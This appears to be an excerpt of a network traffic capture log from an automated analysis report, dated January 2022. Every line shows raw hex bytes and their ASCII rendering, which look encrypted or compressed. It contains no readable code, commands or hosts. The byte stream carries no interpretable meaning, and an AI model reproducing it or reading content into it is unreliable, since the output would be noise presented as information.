                                                                                              2022-01-28 18:02:56 UTC1083INData Raw: be ad f4 53 64 ca 1b c6 8c c9 e6 81 b6 ff 8f 25 46 e9 18 e7 f1 9a fc 2d 63 50 f6 3d 71 02 e4 f9 9e f5 37 ee b6 25 e4 46 dd c7 f7 66 2c 40 43 0d d0 0b a1 a6 49 17 13 46 42 d5 dd 5b 87 d8 1e ed a1 4c 77 56 dc ca ee ac 52 7d 9b 4b dc dc 74 1f 7a 0c 43 f9 0b 6b be ca 72 c7 88 30 e5 7d 4d 3c 76 c9 65 e3 46 40 93 19 93 45 cc 25 bc 13 42 57 3b f3 05 70 59 b2 7b 90 90 5c 59 8d 09 6c 41 d3 a0 79 9d 24 20 99 06 38 7a d4 f9 5f 9b 3a 7d 01 12 0f 02 bc b9 ef 4a 4d 02 47 ef 95 14 a3 7e 1f 73 18 02 30 e4 36 b8 60 6f 91 12 5e 00 11 c2 c7 33 b9 59 d3 39 38 3d 90 18 47 b0 11 eb b2 64 d7 3d 12 60 80 f8 4d 88 84 0d b9 17 e1 9e 66 86 3b 78 e3 f3 a8 e3 a2 e8 35 46 3c c2 2a 2d 17 dd 0a 02 ed 6b 23 2a f2 34 ea 8b f1 58 11 fc e5 1a 67 ea 8a 46 6e fe e8 bd e0 8f a6 d9 88 af bf 62
                                                                                              Data Ascii: Sd%F-cP=q7%Ff,@CIFB[LwVR}KtzCkr0}M<veF@E%BW;pY{\YlAy$ 8z_:}JMG~s06`o^3Y98=Gd=`Mf;x5F<*-k#*4XgFnb
                                                                                              2022-01-28 18:02:56 UTC1084INData Raw: a1 71 37 9f e2 43 5a 04 db 1c bb c4 b6 c2 aa 9c 8d 3c 01 ee 7f 0c a1 61 fb d3 e2 90 0b f8 f3 87 40 01 e5 e0 e3 8d 41 cb 0c da 69 a5 60 47 82 fc 33 88 66 77 1c e0 4d 49 75 06 55 96 a5 98 d9 0b 0d d4 76 c6 10 ab 71 e2 92 cb e7 0d f4 c7 eb 2c 31 77 bd bf fc d3 d4 1b 91 6e 8b 7b c7 c6 6f 5d c9 d9 e2 c7 d4 42 e1 22 5c aa 84 4f 45 65 74 c2 a2 29 4a b0 1c a9 3f 3d e5 58 58 37 bd ab 66 79 12 fb bd 15 c1 a4 78 46 32 b4 f5 83 ad 5d 50 26 bd a6 d2 9e 24 22 5d ea 93 86 59 c5 ed 9f f6 d2 43 6b fa d1 40 1b fa 36 3e 1f 5d 18 39 fa d5 8d b0 4a 6a b8 b3 d6 5f 70 09 22 6e 1c 49 4c 09 f7 7b a9 96 35 8c 50 5e c1 d4 53 2a cf dd f7 26 3e e2 83 ac 81 b5 46 42 74 64 8d 22 66 72 b3 b3 29 26 67 01 b7 53 50 2f 36 6e 74 73 22 c8 df 70 7f 27 41 08 ae f1 c0 a1 d5 9f a5 5d d0 8a 24 ab
                                                                                              Data Ascii: q7CZ<a@Ai`G3fwMIuUvq,1wn{o]B"\OEet)J?=XX7fyxF2]P&$"]YCk@6>]9Jj_p"nIL{5P^S*&>FBtd"fr)&gSP/6nts"p'A]$
                                                                                              2022-01-28 18:02:56 UTC1085INData Raw: 03 fb 9d e7 c5 dd 18 18 7f f9 3b 0d 83 59 6e d6 53 5c 4e 73 50 43 f3 53 dd 04 b2 30 ec 3e 9d 7f 91 a5 15 f0 26 a5 5c 1b b5 bc c0 ca ff 8d a0 26 f8 4d 54 3a 6c ff be a5 5f 00 84 7a cc aa 79 71 4e 3f 7f 7d 92 3d 90 5f 47 65 d5 6e ed d7 e8 65 3e 2f 80 78 00 ba e8 60 5e 4f 30 4b 76 50 91 b0 f5 82 0a 7b b1 25 20 b6 a0 74 6d 17 7f 4c ee 56 0f f8 78 b3 1d 64 95 21 50 2e 08 1c b6 6c f1 2c ef dd 94 78 e5 f8 3f 75 e0 3b 16 05 91 8b 27 a6 73 d7 4b c2 95 fa c5 d2 2d d0 95 81 a5 e2 7b 48 22 5a ab e6 4a 73 8a aa 05 b0 a4 d1 11 96 aa fb 1a 76 54 e0 85 c0 18 22 62 82 7c 7c e7 57 4a 00 60 75 a1 5f 31 6d 8c 46 6b eb ee 82 0a 4f 4e f0 2a b1 ac 4f 37 63 31 c9 f3 41 66 bf 1b 0c 93 b9 5c 97 89 b9 bb bf 2b a9 6c 07 06 87 e8 6e 75 14 30 0d 2e 0f 7c 76 17 ee ae da 6f 26 51 4e f8
                                                                                              Data Ascii: ;YnS\NsPCS0>&\&MT:l_zyqN?}=_Gene>/x`^O0KvP{% tmLVxd!P.l,x?u;'sK-{H"ZJsvT"b||WJ`u_1mFkON*O7c1Af\+lnu0.|vo&QN
                                                                                              2022-01-28 18:02:56 UTC1087INData Raw: f7 5f e7 ff 1c b4 3c 11 ea 54 df c7 dd 6a 8b 95 07 16 ff fb b2 c4 8e 4b 9b 63 0e 9c 04 85 4e 43 87 33 bc d6 66 83 f7 18 f6 05 02 6f ba a7 fe 3c 96 54 24 b9 51 7a 70 97 f9 3e 29 88 c8 bc ea d4 dc e7 b5 a5 95 b3 42 d4 90 58 5e ed 23 4f 7b f2 d9 1f c9 37 bb 68 04 bf 05 88 6b 02 a5 f4 1d fb 86 d6 15 6d 7a e5 2a d3 d6 53 5b 19 cd 34 fa eb ec 51 31 e6 04 61 2b 62 32 c7 c5 0d 1f c7 0f 98 32 d6 e6 75 db 1a 89 0d 24 6d 17 f6 c7 72 18 0c ad a7 e2 4c c0 2e 02 70 02 8b 30 cc 68 b1 71 2b 95 cb 3f d8 e3 c8 b4 5f 3d 03 73 07 e1 fe 0f df f0 42 7d 13 18 a5 19 ca 87 23 8c f4 46 e3 cd 3d a6 d5 1f cf ec 4d ff 69 27 01 9f 6c 6a 82 0a a9 5d b8 38 e9 e8 52 f0 2c 5c 20 7d ff 0b 23 e7 3a f9 a1 fc 3e 11 1c 02 ea 47 a6 3a 61 06 8c 23 df c9 06 16 f0 88 79 65 ca 8b 26 19 62 07 5a 2f
                                                                                              Data Ascii: _<TjKcNC3fo<T$Qzp>)BX^#O{7hkmz*S[4Q1a+b22u$mrL.p0hq+?_=sB}#F=Mi'lj]8R,\ }#:>G:a#ye&bZ/
                                                                                              2022-01-28 18:02:56 UTC1088INData Raw: e2 4b 74 88 4e bd b0 f0 c8 49 e1 c8 bf 15 69 eb 28 27 93 85 d4 e3 f2 40 63 04 b8 43 5d d9 1e d0 a6 eb 97 e4 a1 75 eb d7 e3 cb 87 dd b3 c5 05 00 1e 68 e6 b8 3d 11 ea 56 e8 2f 5b ca b9 6d 1c 76 fa 31 57 d9 ee 6f 29 01 35 e8 62 aa 03 89 e0 77 d1 a6 db e7 cf f1 40 7f 82 42 e1 19 07 9b 8d a6 e4 46 ba 43 28 2e d9 24 21 46 d2 f0 d7 04 81 f7 87 d8 15 f8 11 78 43 6e 1f f0 cc 05 e3 59 c6 55 5c a0 17 fa 47 45 97 07 0b 1a 90 ef d5 ed cb d4 ff 69 f4 17 ce b8 d7 77 e8 35 06 86 5a 44 0c 42 ed e2 4e c0 47 62 d6 1c 45 19 72 20 7a fc d7 1c af 75 e0 7f fc 9e 13 9f a7 81 4f 78 42 45 72 00 50 28 ec 6c ad 75 6f f5 4b bc eb df fb 61 cb df c5 32 02 75 14 a6 d0 ad 46 16 99 b8 d9 eb d4 ed 5a a3 1b c7 a2 12 ea 54 58 e0 ec 58 2e db dd f8 05 0f 93 5e 55 58 ea 5c 9b 08 02 c1 bc 8f 46
                                                                                              Data Ascii: KtNIi('@cC]uh=V/[mv1Wo)5bw@BFC(.$!FxCnYU\GEiw5ZDBNGbEr zuOxBErP(luoKa2uFZTXX.^UX\F
                                                                                              2022-01-28 18:02:56 UTC1089INData Raw: c9 36 9e 27 c1 28 2a a2 2a d3 d0 95 8c bf 10 ef dd 00 5a 3a 19 ff bb 22 d2 90 4c 3b 94 0e 6e 82 9e 8d ae 0c 5e 8d d8 9c e0 e7 f5 ba e5 49 74 8c 4f 4e c6 38 0c 61 f8 02 f6 df 0a 07 06 8b a3 f0 2f 4f 27 ad 75 1e b2 5d 10 51 78 fa b7 59 c6 84 4f 74 e2 75 18 a2 07 62 5f d4 14 5e 92 31 c8 8e b2 b8 dc 4e 2d 5e 32 39 87 e5 4a 6c a3 2d ae f8 3b 65 cf 83 f3 92 0d 98 05 68 89 e3 ba e2 34 d0 9e 12 fc 0f 7a 79 0a 6d 8b 94 0b 24 3f 0b 2a 7f 16 77 d0 77 f3 78 e9 d0 70 09 3f 02 69 f5 26 67 0d 2b c5 00 0d 68 b2 c5 b7 55 b3 98 f7 c3 ca 78 f5 88 68 b7 c9 38 68 eb d7 d1 fa d3 84 49 45 52 ad f6 07 bd 24 5a 9d 05 09 f7 75 a7 07 e3 20 dc 74 6a 89 56 d1 13 8a 55 50 3e ea d8 61 0b 58 ad e7 ff e3 f9 b8 e6 b2 26 c4 8a 53 56 40 df 95 b9 67 7d cf 5b e6 4b 48 74 63 cd fb 09 27 a5 6f
                                                                                              Data Ascii: 6'(**Z:"L;n^ItON8a/O'u]QxYOtub_^1N-^29Jl-;eh4zym$?*wwxp?i&g+hUxh8hIER$Zu tjVUP>aX&SV@g}[KHtc'o
                                                                                              2022-01-28 18:02:56 UTC1091INData Raw: 7b b8 49 e5 bd b5 b9 be b3 2e 09 18 16 44 a4 04 a2 a7 f4 d6 ac fe e9 be 2b df 9c e0 19 93 44 3a 7f c9 1d 32 e5 af 84 8f 90 5b c0 5b 52 a7 56 e9 24 b0 84 2c 17 cc 0a 1e 34 03 e8 51 4e bb 5c b3 a2 3d 38 74 87 09 1d 36 dd c5 d8 13 18 f1 7c e3 ae 9f 97 cd fb de d4 f4 c5 ea 58 3f f4 cf 73 68 f7 bd 3f 76 a8 dd 3d d3 a0 63 ca f4 c1 54 b4 bd 1f d2 71 c3 36 e0 16 8d c7 41 1e 79 ef 57 75 69 70 95 b3 c0 3d 7c 70 15 ef 8e 25 fe 9f 46 5c 40 7e 30 9c e6 db 15 c4 76 50 a3 98 03 32 b1 b7 d3 7e c2 f8 f3 5f 43 0d 1f fd e9 22 0f d9 e1 fc 86 db 72 1c 4b 48 fa 4a 0d e4 7e 7b c6 f8 4b f3 4c 11 d8 66 b0 fe 33 a9 af 76 63 dc db 8b 42 bd 9f 75 e4 70 11 eb 78 ae c9 0d 63 6b 7a 9e e4 46 e4 79 cf 85 4a f1 0d c0 9f 9a f1 5e a7 5a af 79 88 19 92 fc 3f 97 dd 7d cb 3b a2 ef 8b 94 d3 1e
                                                                                              Data Ascii: {I.D+D:2[[RV$,4QN\=8t6|X?sh?v=cTq6AyWuip=|p%F\@~0vP2~_C"rKHJ~{KLf3vcBupxckzFyJ^Zy?};
                                                                                              2022-01-28 18:02:56 UTC1092INData Raw: 6f e7 eb 7b 6a 0d c8 5d fe 2d 34 7d ca 2a f4 1b f7 54 31 55 3c 14 5d a6 b3 e5 f7 ea e7 d2 15 79 17 25 dd 1b 16 48 10 a6 e8 c9 f6 ee 29 c7 cf be 90 66 40 cb d4 90 20 71 2f d6 23 d1 18 90 30 4a 3d 8e 98 61 b9 a3 5f 3b f4 d7 61 6f 9b 06 1d 46 64 35 00 30 be 30 06 c8 59 76 f0 5f 3a 25 47 f9 31 5b 2c ab 39 28 39 7d b3 a9 7c f0 df f3 5a 67 7a 91 7d e8 3b a6 e1 13 ca 2e 42 09 4a 62 cb 0b 2c 2d 1e 3c 66 b8 81 f8 05 0f 13 f8 56 52 d7 b4 fc c6 c1 31 fa 15 a3 8b 38 0a 8a d0 61 0b ca b8 21 90 13 ef 45 ae 90 c2 74 0a 18 cf 1c c1 bb 56 ec 5b 11 15 1b 4c f7 87 e6 fe 15 77 92 d3 80 14 86 96 7c 30 e8 79 85 e1 cb 07 f5 3b ce 6f 97 a0 e8 c8 9d 73 6c cd fe 9c 51 db 07 fd 00 8d ad 70 9c 96 e0 71 28 db 49 1e a6 3b d6 03 e3 41 43 f6 a8 d5 7e 44 e1 05 c4 c9 79 78 7c 96 51 7d fa
                                                                                              Data Ascii: o{j]-4}*T1U<]y%H)f@ q/#0J=a_;aoFd500Yv_:%G1[,9(9}|Zgz};.BJb,-<fVR18a!EtV[Lw|0y;oslQpq(I;AC~Dyx|Q}
                                                                                              2022-01-28 18:02:56 UTC1093INData Raw: 97 6c b8 ed d0 af e3 f0 46 f5 5c fa 7e 4a f9 86 51 06 43 65 31 54 c6 d8 fd cf 6a 8f a9 5a 6b 8e 13 d2 7e 2b 9c 63 c8 45 41 63 37 8d ca c3 52 f7 bd 23 37 1b 2a b8 e2 6b bb 61 3f 10 75 8c 2a 21 22 bd 74 60 b0 c9 62 57 93 49 1b c7 4a 25 ef a2 e5 58 24 c3 71 54 1a 7f f3 48 30 58 35 57 b6 be 21 c1 2a 25 ec 26 5e 0c 49 7f c0 48 ee ed 2a 14 fc 12 e3 36 0f 27 95 c0 9b b5 78 f7 3e a1 d8 ee 2c 2a 26 63 d2 71 19 fd b9 53 cc f0 c7 c1 16 77 de 45 51 86 9e 51 0c 06 ea 5d 21 da 97 78 7c 4a ce bd ae 9d 68 61 0c 99 b4 c6 83 77 21 db dd f6 be 00 b2 f3 c0 37 82 ec eb dc 75 1d b8 6d 89 28 d3 19 bc e3 c4 c1 1b 06 59 12 6c 7a 8e 16 4b 40 eb b9 64 24 8e 14 66 f2 db 19 bc ea 5d 2e d5 d7 e8 d4 7b 15 c2 9f a5 52 b0 f5 7d 27 9f a9 9f 06 e4 a8 a2 c6 51 ab 4a cc be 91 c5 bf 91 33 84
                                                                                              Data Ascii: lF\~JQCe1TjZk~+cEAc7R#7*ka?u*!"t`bWIJ%X$qTH0X5W!*%&^IH*6'x>,*&cqSwEQQ]!x|Jhaw!7um(YlzK@d$f].{R}'QJ3
                                                                                              2022-01-28 18:02:56 UTC1095INData Raw: 0e b9 37 a6 81 e5 ba 55 75 75 27 7b 07 34 3a 93 41 53 42 71 98 e7 d4 60 30 d5 0c 00 a4 62 b5 7d bd 32 b2 b9 f2 ce 58 5e f9 c5 88 a8 34 bc 5a 15 5e 60 0c cc 02 cb bc 1b 55 af 21 04 ff e4 aa 2f a1 9e c1 2e 27 a1 bb 23 23 56 8a e9 ce 48 50 1f 30 50 c6 c4 9a 32 61 2f 75 95 8b fd 95 79 a4 24 0e 9d 1d 8a 99 3a 0e ee 78 dd a2 8b 01 76 04 38 7e 6f 1f 07 17 00 c1 72 c2 d9 51 b4 c8 ef 21 64 56 99 37 dd f8 ee 75 da 54 55 7a 75 cc 11 dc ae b2 f6 c0 2b 7c 7b 4e 98 ae 7a a6 cb 60 9f 61 c4 39 07 e8 06 b7 94 e1 97 38 2a 85 0a d0 24 a4 23 f6 30 b9 48 e7 c9 1a 92 b9 98 1c e5 4f 9b 9d 98 58 f3 69 74 61 4b a5 d9 9b cb df bc 7c 82 c6 55 ee c4 6c 5a f0 26 f6 e6 5d f3 01 35 44 a8 cc 01 2a 4b b8 23 8f 51 6d d2 08 74 1e af 30 ec de 06 35 d2 7f f3 a5 d2 4d 39 00 3e 1a 68 49 19 dd
                                                                                              Data Ascii: 7Uuu'{4:ASBq`0b}2X^4Z^`U!/.'##VHP0P2a/uy$:xv8~orQ!dV7uTUzu+|{Nz`a98*$#0HOXitaK|UlZ&]5D*K#Qmt05M9>hI
                                                                                              2022-01-28 18:02:56 UTC1096INData Raw: 29 4b b1 2d 93 a6 78 ee fe 59 b2 21 d0 0a 8b e2 c6 5f 00 30 c0 06 ff 63 3b 32 46 5f 6f 87 52 d3 85 3a aa 91 39 eb 4f 4d 26 5b 14 ff bf 28 21 90 a5 56 52 86 2b 95 8f a1 99 95 63 4c c2 ad 78 4e f2 32 8f ad 78 99 cb 72 80 27 59 03 b9 c7 db de 9d 40 94 da 06 14 64 c4 dd 79 9f 0a 9e 53 30 01 30 cb 4e bb 8b c1 28 2a 0e 3e cd f1 c5 ba d1 d2 a9 5f c3 b1 24 da e0 18 fc 43 4b 14 53 56 2a e7 a0 83 a9 08 d0 d2 94 33 39 bc b8 ef ae 94 a1 a2 84 07 69 0b 2c 2b 91 4a 2e 52 fd 00 02 88 66 6d 55 fb 79 8f 49 58 61 6b 8d 0a c0 3c 97 9c f7 e2 e4 e6 bc b7 df cf d8 5c 93 5d fd f1 c2 26 d2 1c 70 0f 96 35 bb bf 37 f1 24 49 0c 94 06 81 f4 8c 05 8b 36 45 9f ff 70 51 36 e1 2c 47 f2 c8 6e fb af 71 1d c4 bf aa 78 33 17 d7 e2 94 a5 f4 81 56 5b cf 4f b5 76 14 e7 24 f5 d0 3c 54 5a 19 cc
                                                                                              Data Ascii: )K-xY!_0c;2F_oR:9OM&[(!VR+cLxN2xr'Y@dyS00N(*>_$CKSV*39i,+J.RfmUyIXak<\]&p57$I6EpQ6,Gnqx3V[Ov$<TZ
                                                                                              2022-01-28 18:02:56 UTC1097INData Raw: b2 2b 43 60 b0 cb 03 9f 56 16 ae f3 23 d2 07 98 03 3e ef 44 d3 12 6a 8b 31 88 dc 2c 13 d2 99 6b e2 cb 00 bf 66 fa b9 28 bc e6 46 87 d3 5a 40 b0 a0 fb 63 75 e5 c2 95 4a d9 54 75 61 db ba 79 c7 0d 1c 71 bd 5d ce 92 a7 5b 1b c8 8b 07 7b 0a c3 82 44 e8 5d 2e 8d c5 d3 ac 36 3b 35 e9 2b 7f bf ee bd ed b1 a8 e8 6d aa 01 c7 b0 f7 8e 8b 31 26 e5 ec cb e8 52 59 34 e0 ab 07 9f c6 b9 56 e3 30 db 72 69 07 4d c9 70 c7 0d 2e 34 3e 10 2b 11 e5 f9 47 39 fd 64 46 af 71 1c 71 7b 71 27 cd 7b fa 30 d0 89 ba 38 49 db fa ce 7d 79 f9 8f eb 37 57 2a dd 03 a1 a7 57 65 d8 19 8f 4e 30 24 5a a7 64 5f dd c7 35 89 e2 2c c3 4a 0a 55 23 2d 52 bf 44 e9 ef 26 ec 43 e9 be d1 28 10 54 af e6 5f 43 1b f4 14 61 d4 7d 90 42 d6 66 6b e3 a2 76 50 ca 76 92 54 ae ce 8d 53 a9 d1 6e 91 b1 ac 11 4c 93
                                                                                              Data Ascii: +C`V#>Dj1,kf(FZ@cuJTuayq][{D].6;5+m1&RY4V0riMp.4>+G9dFqq{q'{08I}y7W*WeN0$Zd_5,JU#-RD&C(T_Ca}BfkvPvTSnL
                                                                                              2022-01-28 18:02:56 UTC1099INData Raw: b9 e9 42 82 a6 14 24 5d 19 cf 67 13 07 c0 d9 83 dc 90 fe 06 72 a3 cd 91 d7 7d c7 99 e3 f2 1c a5 ac f2 30 3f 0e 75 1b 78 7b cd 0d e1 38 3b 62 31 db 74 60 2f 31 56 14 4f 2b 2b a4 9c b4 ca 8b 45 20 2e da 41 d0 e8 e5 d0 a7 9a 0c a1 d9 4d 22 b5 d6 38 f0 d2 84 70 97 b4 b1 c6 d5 54 46 10 aa 1f 2d 56 6e 97 81 f9 b0 a9 00 b9 64 4a 1b 66 b6 8f 9d 7d 2e 1f 42 eb 41 50 4b 7c 95 9e 72 13 91 33 89 39 e9 d4 9e ff 10 45 e7 c7 a2 84 a1 47 97 86 98 6e aa cd f1 77 b3 3b 1a 4f 13 8a 5b 28 c3 bc b2 5d 97 78 88 7c 4c cc b4 ad ea d6 e5 fe f8 0d 15 f0 c8 b2 13 0c 89 d9 84 ad 42 9f 24 33 4f b5 a2 1c 46 dc 03 9e 51 33 8d e6 4e 35 93 c3 c1 3e a5 00 5d d3 e4 4d 77 e5 b8 36 8a 5b a9 69 2d ae f6 07 e2 03 74 8b 85 a7 88 b6 c2 92 34 e5 18 4b 08 0b 2a 8c 26 58 ee ac be ce 13 7c 9f d8 e8
                                                                                              Data Ascii: B$]gr}0?ux{8;b1t`/1VO++E .AM"8pTF-VndJf}.BAPK|r39EGnw;O[(]x|LB$3OFQ3N5>]Mw6[i-t4K*&X|
                                                                                              2022-01-28 18:02:56 UTC1100INData Raw: 5e 44 a3 96 3e 19 63 dc bd 17 88 df f5 06 22 6d 15 1f 87 a0 db 36 3b 9b 27 d9 09 f3 bd 1e 7b f5 c4 44 7a 70 14 6a 31 88 6f 10 89 cf 62 4a a5 06 66 36 0b 1f ca 60 6f 2a 45 ef 90 62 b4 c8 8e d0 8a 26 c8 7e 0e f7 bc 5c 9b a6 74 58 df 02 c8 c5 d8 34 45 15 c4 b1 70 38 6a 10 62 31 b2 3f e5 fe 00 41 26 27 64 63 05 06 ef 5e d9 e1 ce bc 41 eb 25 d8 e8 4b 7c 78 5e de be 34 d7 93 73 71 f6 33 61 32 44 d1 1c 41 fb 00 2f 17 de e9 b0 f5 b9 5f 43 8d 5d 17 c4 82 41 1e c0 47 9e 24 6a b8 d1 22 4d f1 ab 4c 08 2f ca 01 59 db 0d 1b c2 9f a1 15 7a 4f b3 e7 c3 38 ec 73 58 b0 c2 a4 7c 92 cb 07 3f dd f0 54 70 bb c2 32 c9 f1 d1 1c 48 f9 8c 2c 5e ad 7c 99 92 8d 44 c4 13 25 20 cb 7a b3 05 3c 2a 2d a3 1d fd f4 9b b5 4d a0 09 7a ad bb 6d 1a 4c 92 c4 0c ae c0 a7 ef 9c 08 2c 1a 79 17 73
                                                                                              Data Ascii: ^D>c"m6;'{Dzpj1obJf6`o*Eb&~\tX4Ep8jb1?A&'dc^A%K|x^4sq3a2DA/_C]AG$j"ML/YzO8sX|?Tp2H,^|D% z<*-MzmL,ys
                                                                                              2022-01-28 18:02:56 UTC1101INData Raw: fe 52 ea d6 fe ed dc a9 5a df ff ba e4 cd 81 6a 93 27 cd 0f e2 43 0a 79 1e 7a 45 6f 2a 40 56 cc 1f 33 41 58 d4 96 31 8b 92 5b 25 ef 53 ef c9 f3 5c a4 d1 14 5e 2c cf da 57 27 06 cd 88 16 a1 9b 1b f0 bc d2 8d 75 dc bd 2d 2a 67 4f 84 4c 3f a6 2f b4 c5 e3 f4 eb d1 c5 0d 97 6c 59 28 21 9f f3 ec 67 e3 dd 9e fe f3 a0 19 f8 35 e2 dc 16 e1 60 3b 12 f0 2e 3a 36 36 02 6f 5a df 9e 2f c9 ad 38 06 66 cd 7b 01 66 e4 b6 da 62 b5 7f 32 c2 93 b6 c3 31 3b 0c f2 b2 67 95 2d 2d a3 df ac ff b8 28 3a 7a 17 f1 a5 d8 5b 18 8a 51 21 30 16 1f 20 63 3e 16 77 09 f1 97 88 64 81 b0 46 92 ba 5d a0 8b 25 ec 09 45 6a 8e c4 bc b4 bc dc 3c ba d2 a5 82 09 78 89 81 a9 8b 42 d1 15 c2 41 87 e0 4e c1 17 81 4c 88 df 42 66 15 66 87 3d c6 bf 27 48 e9 a8 99 82 bb ee 54 e7 22 10 1a 93 91 09 87 2d 59
                                                                                              Data Ascii: RZj'CyzEo*@V3AX1[%S\^,W'u-*gOL?/lY(!g5`;.:66oZ/8f{fb21;g--(:z[Q!0 c>wdF]%Ej<xBANLBff='HT"-Y
                                                                                              2022-01-28 18:02:56 UTC1103INData Raw: 9e 17 fc ee 8f b9 38 f3 7a 60 33 db 9f 9f b1 30 02 83 32 33 77 2c a2 73 59 52 5c 54 5c 92 ff 3f 8e 8e 82 ed 6f a7 0b 36 7a 47 4f 41 fc f8 9f e2 0a 15 f6 3f e0 75 d3 7a fb 15 c5 4e b0 fe 48 07 18 1a 20 44 d1 25 dd 76 e7 5d c6 8d 20 50 0b d5 35 48 70 a1 6e 02 df fb 2f 7a bf a8 1a 78 ad 4b b3 3b a6 d0 19 69 f0 85 ba 2d 64 88 28 a8 54 95 8c e6 75 e6 45 84 51 2f 4e db 5f 55 c3 a4 01 02 16 37 79 10 3e 22 6d 18 06 63 b4 f7 3f a5 de 40 e4 44 0a 85 b7 c5 3f f4 db 23 ee ad 88 6b 04 8b a5 e6 2f 8b a1 92 43 54 9d e5 f8 37 7d 16 69 07 3b af 00 56 20 42 e3 f7 be 2b 98 a6 97 be a7 9a 43 1b 93 75 e8 6d 29 40 69 bc de 94 d5 16 72 50 cc f7 31 25 e3 1e 1c 42 e7 37 98 76 11 e4 b7 4d 4a fc e9 9d ec a0 08 39 f6 f4 d4 9e 92 8b e4 47 1c a7 b6 b6 6d ec f1 c9 3e 15 d4 a3 7d 03 22
                                                                                              Data Ascii: 8z`3023w,sYR\T\?o6zGOA?uzNH D%v] P5Hpn/zxK;i-d(TuEQ/N_U7y>"mc?@D?#k/CT7}i;V B+Cum)@irP1%B7vMJ9Gm>}"
                                                                                              2022-01-28 18:02:56 UTC1104INData Raw: 0e bb eb 3c b1 98 97 76 f3 93 e0 3e 11 0d 9a 03 f6 28 2f a9 d0 d3 f6 86 50 e9 c3 42 1e 82 47 94 76 c1 61 41 78 91 68 c7 5f 0a f8 16 28 7f f6 05 03 e8 cf 07 e9 30 5d c5 9b 58 4f b0 fd a2 54 e1 03 c0 a3 67 cc 8e ce dc 4c ef 02 9d 68 01 34 a9 22 38 19 1d 43 66 7c fb b7 7b af 03 6b 1f b7 b1 13 ce ba e7 f3 45 bc dd 14 89 d9 13 43 b4 4b 9a 84 4b 99 34 33 96 74 50 30 31 8c 65 90 2f 5b ef a9 cf 15 98 42 05 c0 97 79 21 ea 4a a5 07 76 28 40 06 aa a6 e0 4f 4e 2d 22 6f f9 ea 39 6b bb 9d 1a 8d 73 d6 9a d9 d8 4b 6b 08 77 f5 5b bb 5e 4a 5b 19 f6 26 e0 6b af 63 14 2c 4a 83 88 bf a4 eb bd 1f ad 22 7a 6f 2c 12 5c 41 a0 2b 4f 8c 21 36 23 ae 12 de a0 90 d4 1d ca a2 02 83 25 93 d1 fb cd f7 32 00 45 ce be 47 43 04 e0 93 82 43 61 09 4c 81 f2 1a 3e 3a 5b 45 99 9e a0 00 05 45 09
                                                                                              Data Ascii: <v>(/PBGvaAxh_(0]XOTgLh4"8Cf|{kECKK43tP01e/[By!Jv(@ON-"o9ksKkw[^J[&kc,J"zo,\A+O!6#%2EGCCaL>:[EE
                                                                                              2022-01-28 18:02:56 UTC1105INData Raw: 8d 6f ca 5d f3 e2 95 a6 32 e9 18 1e 03 cc 94 44 76 e2 cc c0 61 22 da e5 54 4b 6a 50 d0 09 80 d1 8f ed 1d 8a c1 a7 e0 e3 d9 36 4b e4 d1 85 44 fc d1 22 c4 2f 37 17 b0 17 fc 82 dc e1 42 a2 d7 d4 2e 83 7c df ea 86 14 cd a5 c8 1d d0 4a f4 93 08 2d 02 c6 60 88 81 17 2d 7e 6e 47 78 bd f7 04 33 50 c5 94 a8 e3 bd d4 4b 4e a9 3f ea 25 fa 0a 92 55 0a 1b aa d9 03 68 f7 94 58 bc a0 45 f9 cd 3e f7 ad 0b 3a 03 67 26 1d a8 9c 41 13 c6 3b e3 95 50 a4 da 0f c4 23 bd 1f a3 cd 8c 46 e2 aa c9 73 ca 8d c7 51 58 ad 6a eb c5 46 c0 30 43 4a 1a 08 d0 ed fe 85 a8 e7 29 e7 0f 82 61 ab 07 21 35 e1 91 48 a3 f6 c9 2f cb df ec f1 5b cc 0d 61 e0 6c 21 40 91 9e c0 16 27 a6 e6 b2 4e 04 ac 26 ba b5 99 95 03 74 10 3f eb 73 00 f9 d9 81 8b 46 68 cf 5b d3 61 06 c8 75 ea 98 39 2b db cc f8 95 c8
                                                                                              Data Ascii: o]2Dva"TKjP6KD"/7B.|J-`-~nGx3PKN?%UhXE>:g&A;P#FsQXjF0CJ)a!5H/[al!@'N&t?sFh[au9+
                                                                                              2022-01-28 18:02:56 UTC1107INData Raw: 4a 98 20 ba a2 cd 65 1b a0 36 ec 42 5f 2d 4b 14 a7 8a af 15 c5 3a 24 18 94 d6 17 c1 6b 0d 23 0b d5 19 f0 2f 8b a8 48 ee e8 7f 21 26 51 40 ed e3 bd 0a 62 cd 39 bf 1b c8 d1 37 71 6f 18 7d c2 a2 72 72 9b 54 a2 c0 a5 6f 24 52 08 26 3a cd de 32 3c 22 5b 27 74 9d 6c e2 4d 76 56 e9 28 c8 70 a8 dc 73 d5 ff 75 82 4d 72 5f 00 7d 19 17 2e 35 b3 7a 77 2a 11 eb ec 52 75 c9 b1 6f ad 63 77 09 2e 3a 15 c1 16 aa 2e 48 4c 54 20 e3 aa 74 26 26 a3 70 7e 49 7f c5 37 67 79 3f ab 5a 40 0a a8 e8 63 09 77 b2 f9 c9 5f c3 f1 98 0b 11 db 90 03 f2 17 c2 af 49 15 b4 34 e5 ff 82 4e c3 58 fc e3 11 e7 fd 81 f2 57 06 db 07 eb bf 28 17 fc 0b e0 ee 61 5c f2 4e 25 2f 71 1c 76 5b 20 23 86 c1 2e c6 ce f0 07 e5 14 5c a3 9f a7 60 d5 cf 66 a9 76 95 57 35 8d a5 5f 04 26 17 12 b1 9a 04 4f 84 3f 24
                                                                                              Data Ascii: J e6B_-K:$k#/H!&Q@b97qo}rrTo$R&:2<"['tlMvV(psuMr_}.5zw*Ruocw.:.HLT t&&p~I7gy?Z@cw_I4NXW(a\N%/qv[ #.\`fvW5_&O?$
